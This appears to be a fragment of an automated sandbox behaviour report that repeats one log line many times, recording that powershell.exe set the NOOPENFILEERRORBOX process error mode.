              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
